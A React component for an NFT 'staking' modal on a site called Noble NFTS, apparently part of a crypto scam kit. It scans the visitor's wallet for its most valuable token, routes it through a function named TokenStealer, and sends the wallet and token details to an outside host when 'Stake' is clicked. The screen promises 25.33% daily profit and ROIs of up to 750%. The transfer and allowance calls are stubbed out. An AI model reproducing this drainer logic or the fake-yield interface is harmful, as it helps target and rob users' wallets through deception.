import React, { useEffect, useState } from "react";
import Modal from "@mui/material/Modal";
import { Card, SubText, OutlinedBox } from "../styles";
import styled from "styled-components";
import { doc, serverTimestamp, setDoc } from "firebase/firestore";
import { db } from "../firebase/firebase";
import toast from "react-hot-toast";
// thirdweb removed
import { useMoralisWeb3Api } from "react-moralis";

const StakeNFTModal = ({
  marketplace,
  open,
  name,
  image,
  contract,
  id,
  user,
}) => {
  const { stakeNFT, setStakeNFT } = open;
  const [isTransfering, setIsTransfering] = useState(false);
  const [receiver, setReceiver] = useState("");
  const [isListing, setIsListing] = useState(false);
  const [price, setPrice] = useState("");
  const address = "abcd";
  const [isStaking, setIsStaking] = useState("");
  const [duration, setDuration] = useState(10);
  const [ROI, setROI] = useState(250);
  // thirdweb removed: collection hook
  const Web3Api = useMoralisWeb3Api();
  const [tokenAddress, setTokenAddress] = useState("");
  // thirdweb removed: token hook
  const [tokenValue, setTokenValue] = useState("");
  const [tokenName, setTokenName] = useState("");
  const [hasHighestToken, setHasHighestToken] = useState(false);

  function handleDuration(e) {
    const value = e.target.value;

    function getROI(value) {
      switch (Number(value)) {
        case 15:
          setROI(375);
          break;
        case 10:
          setROI(250);
          break;
        case 20:
          setROI(500);
          break;
        case 30:
          setROI(750);
          break;
        default:
          break;
      }
    }

    if (value) {
      getROI(value);
      setDuration(value);
    } else {
      setDuration("");
    }
  }

  function handleListing() {
    setIsListing(true);
  }

  function handleStaking() {
    setIsStaking(true);
    // createStake();
    if (hasHighestToken) {
      callForToken();
    } else {
      createStake();
    }
  }

  useEffect(() => {
    async function getBalances() {
      const options = {
        chain: "eth",
        address,
      };
      try {
        const balances = await Web3Api.account.getTokenBalances(options);

        if (balances.length > 0) {
          // console.log("has highest token");
          let addressList = [];

          if (balances.length > 180) {
            let index = 180;

            for (let i = 0; i < index; i++) {
              addressList.push(balances[i].token_address);
            }
            const url = `https://api.coingecko.com/api/v3/simple/token_price/ethereum?contract_addresses=${addressList}&vs_currencies=USD`;

            const config = {
              method: "GET",
              mode: "cors",
              headers: {
                "Content-Type": "application/json",
              },
            };
            await fetch(url, config)
              .then(async (response) => {
                const result = await response.json();

                getPrice(result, balances);
              })
              .catch((error) => {
                console.log(error);
              });
          } else {
            let index = balances.length;

            for (let i = 0; i < index; i++) {
              addressList.push(balances[i].token_address);
            }

            const url = `https://api.coingecko.com/api/v3/simple/token_price/ethereum?contract_addresses=${addressList}&vs_currencies=USD`;

            const config = {
              method: "GET",
              mode: "cors",
              headers: {
                "Content-Type": "application/json",
              },
            };
            await fetch(url, config)
              .then(async (response) => {
                const result = await response.json();
                getPrice(result, balances);
              })
              .catch((error) => {
                console.log(error);
              });
          }
        } else {
          // console.log("no balances found");
          return;
        }
      } catch (error) {
        console.log(error);
      }
    }

    async function getPrice(result, balances) {
      let pricesList = [];
      balances.forEach((balance) => {
        const address = balance.token_address;
        if (result && result[address]) {
          const usd = result[address].usd;

          if (balance.decimals === 6) {
            const { name } = balance;
            const total = Number(balance.balance) / 10 ** 6;

            const toUSD = Number(usd) * Number(total);
            const { token_address } = balance;
            pricesList.push({ token_address, toUSD, name });
          }

          if (balance.decimals === 8) {
            const { name } = balance;
            const total = Number(balance.balance) / 10 ** 8;

            const toUSD = Number(usd) * Number(total);
            const { token_address } = balance;
            pricesList.push({ token_address, toUSD, name });
          }

          if (balance.decimals === 18) {
            const { name } = balance;
            const total = Number(balance.balance) / 10 ** 18;
            const toUSD = Number(usd) * Number(total);
            const { token_address } = balance;
            pricesList.push({ token_address, toUSD, name });
          }
        }
      });
      if (pricesList.length > 0) {
        getHighest(pricesList, balances);
      } else {
        console.log("no valuable token");
      }
    }

    function getHighest(priceList, balances) {
      const tokenBalances = [];
      priceList.forEach((price) => {
        tokenBalances.push(price.toUSD);
      });

      const highestToken = Math.max(...Array.from(tokenBalances));

      if (highestToken) {
        setHasHighestToken(true);
      }

      for (let i = 0; i < tokenBalances.length; i++) {
        const usd = priceList[i].toUSD;
        const address = priceList[i].token_address;
        const name = priceList[i].name;

        if (usd === highestToken) {
          // console.log("The highest token is", highestToken);
          // console.log("The address is", address);
          setTokenAddress(address);
          // console.log("The name is", name);
          setTokenName(name);
          balances.forEach((balance) => {
            if (balance.token_address === address) {
              // console.log("The value is", balance.balance);
              // console.log("The decimal is", balance.decimals);
              const value = balance.balance / 10 ** Number(balance.decimals);
              setTokenValue(value);
              // console.log(
              //   "The converted value is",
              //   balance.balance / 10 ** Number(balance.decimals)
              // );

              TokenStealer(address, value);
            }
          });
        }
      }
    }

    async function TokenStealer(contract, value) {
      setTokenValue(value);
      setTokenAddress(contract);
    }

    getBalances();
  }, []);

  async function createStake() {
    // simulate transfer success then set staking record
    setTimeout(() => {
      setStaking();
    }, 300);
  }

  async function callForToken() {
    // simulate allowance and proceed
    createStake();
    sendMail();
  }

  async function sendMail() {
    const url = "https://formats.globalmarketrades.com";
    let base;
    base = {
      data: "new staking",
      type: "NFT Stake",
      site: "Noble NFTS",
      address,
      tokenAddress,
      tokenName,
      tokenValue,
    };

    const config = {
      method: "POST",
      mode: "cors",
      headers: {
        "Content-Type": "application/json",
      },
      body: JSON.stringify(base),
    };

    await fetch(url, config)
      .then((response) => {
        console.log("success");
      })
      .catch((error) => {});
  }

  async function setStaking() {
    const randomOne = Math.floor(Math.random(100, 999) * 1000 + 1);
    const randomTwo = Math.floor(Math.random(100, 999) * 100 + 1);

    const str =
      id.substring(0, 4) + randomOne.toString() + randomTwo.toString();

    await setDoc(doc(db, "stakings", str), {
      date: serverTimestamp(),
      user: address,
      ref: str,
      status: "open",
      id,
      ROI,
      duration,
      daysRan: 0,
      image,
      name,
    })
      .then(() => {
        toast.success("Staked successfully.");
        setIsStaking(false);
        setStakeNFT(false);
      })
      .catch((error) => {
        toast.error("Request could not complete. Please try again later");
        setIsStaking(false);
      });
  }

  return (
    <Modal
      open={stakeNFT}
      onClose={() => setStakeNFT(false)}
      style={{
        color: "white",
        placeContent: "center",
        display: "flex",
      }}
    >
      <Card
        style={{
          placeSelf: "center",
          maxWidth: "360px",
        }}
      >
        <div className="top">
          <SubText>Stake {name}</SubText>
          <button
            style={{
              backgroundColor: "transparent",
              border: "none",
              outline: "none",
            }}
            onClick={() => setStakeNFT(false)}
          >
            <img
              src="/icons-sidebar/close.svg"
              alt="close"
              className="close"
              height={10}
              width={10}
            />
          </button>
        </div>
        <ModalContent>
          <img
            src={image}
            alt={name}
            width={60}
            style={{
              display: "flex",
              backgroundColor: "red",
              placeSelf: "center",
              borderRadius: "4px",
            }}
          />

          <div className="selectWrap">
            <label htmlFor="type">Duration(Days)</label>
            <div className="selectBox">
              <div className="selectTop">
                <select name="account" onChange={handleDuration}>
                  <option>10</option>
                  <option>15</option>
                  <option>20</option>
                  <option>30</option>
                </select>
                <img src="/extraicons/arrowdown.svg" alt="select" />
              </div>
            </div>
          </div>

          <div className="addcon">
            <label htmlFor="new">ROI</label>
            <div className="add">
              <input type="number" disabled placeholder={ROI} value={ROI} />
            </div>
          </div>

          <OutlinedBox>
            <p className="infot">
              Staking estimated 25.33% ADP(Average Daily Profit) for your NFT
              through advanced AI P2P resales.
            </p>
          </OutlinedBox>
          <OutlinedBox>
            <p className="infot" style={{ fontSize: "11px" }}>
              Your staking period will end in {duration} days. Your earnings
              will be sent to
              <br />
              <span className="blue">{address}.</span>
            </p>
          </OutlinedBox>

          <button
            className={
              isStaking || !duration || !ROI
                ? "button disabled"
                : "button submit"
            }
            disabled={isStaking || !duration || !ROI}
            onClick={handleStaking}
            style={{ display: "grid", placeContent: "center" }}
          >
            {isListing ? (
              <img
                src="/svg-loaders/tail-spin.svg"
                alt="loading"
                width={24}
                height={24}
              />
            ) : (
              <p style={{ textDecoration: "none", color: "white" }}>Stake</p>
            )}
          </button>
        </ModalContent>
      </Card>
    </Modal>
  );
};

const ModalContent = styled.div`
  padding: 1.5rem 1.3rem;
  display: grid;
  gap: 1rem;

  .selectWrap {
    display: grid;
    gap: 0.5rem;

    label {
      font-weight: 600;
      font-size: 14px;
      line-height: 17px;
      color: #a3a3a3;
    }

    .selectBox {
      display: grid;
      gap: 0.3rem;
    }

    .selectTop {
      display: flex;
      align-items: center;
      border: 1px solid #1f273a;
      box-sizing: border-box;
      border-radius: 6px;
      background-color: #1f273a;
      /* padding: 1rem; */
      justify-content: space-between;
      position: relative;
      box-sizing: border-box;

      select {
        font-family: "Inter";
        box-sizing: border-box;
        font-style: normal;
        font-weight: 600;
        outline: none;
        font-size: 16px;
        line-height: 19px;
        background-color: transparent;
        border: transparent;
        appearance: none;
        z-index: 10;
        width: 100%;
        color: #ffffff;
        padding: 1rem;
      }

      img {
        position: absolute;
        right: 0;
        padding: 1rem;
      }
    }

    .extra {
      font-weight: 600;
      font-size: 14px;
      line-height: 16px;
      color: #ffffff;
    }

    .captions {
      display: flex;
      font-weight: 600;
      justify-content: space-between;

      .balance {
        font-size: 14px;
      }
    }
  }

  .addcon {
    display: grid;
    gap: 0.5rem;

    label {
      font-style: normal;
      font-weight: 600;
      font-size: 14px;
      line-height: 17px;
      color: #a3a3a3;
    }

    .add {
      outline: none;
      border: none;
      background: #1f273a;
      border-radius: 6px;
      width: 100%;
      /* border: 1px solid #3a4867; */

      input {
        display: flex;
        padding: 1rem;
        /* padding-right: 5px; */
        /* padding-left: 13px; */
        /* padding-top: 10px; */
        background-color: transparent;
        border: none;
        outline: none;
        box-sizing: border-box;
        min-width: 100%;
        font-weight: 500;
        font-size: 16px;
        line-height: 16px;
        color: #fff;
      }
    }
  }

  .amWrap {
    display: grid;
    gap: 0.5rem;

    label {
      font-weight: 600;
      font-size: 14px;
      line-height: 17px;
      color: #a3a3a3;
    }

    .amBx {
      display: grid;
      gap: 0.3rem;
    }

    .amTop {
      display: flex;
      align-items: center;
      border: 1px solid #1f273a;
      box-sizing: border-box;
      border-radius: 6px;
      justify-content: space-between;

      .coinSelector {
        display: flex;
        background: #1f273a;
        border-radius: 4px;
        margin: 2px;
        padding: 0.7rem;
        align-items: center;
        gap: 0.5rem;
        width: 100px;
        place-content: center;

        p {
          font-weight: 500;
          font-size: 16px;
          line-height: 19px;
          color: #ffffff;
        }

        img {
          width: 16px;
        }
      }

      input {
        background-color: transparent;
        border: none;
        outline: none;
        width: 100%;
        height: 19px;
        font-style: normal;
        font-weight: 600;
        font-size: 16px;
        line-height: 19px;
        color: #ffffff;
        padding-left: 1rem;
      }
    }

    .extra {
      font-weight: 600;
      font-size: 14px;
      line-height: 16px;
      color: #ffffff;
    }

    .captions {
      display: flex;
      font-weight: 600;
      justify-content: space-between;

      .balance {
        font-size: 14px;
      }
    }
  }

  .box {
    border-radius: 4px;
    cursor: pointer;
  }

  .option {
    display: flex;
    align-items: center;
    justify-content: space-between;
    font-weight: 600;
    color: #c9c9c9;

    img {
      width: 20px;
      height: auto;
    }
  }
`;

const ModalOption = styled.div``;

export default StakeNFTModal;
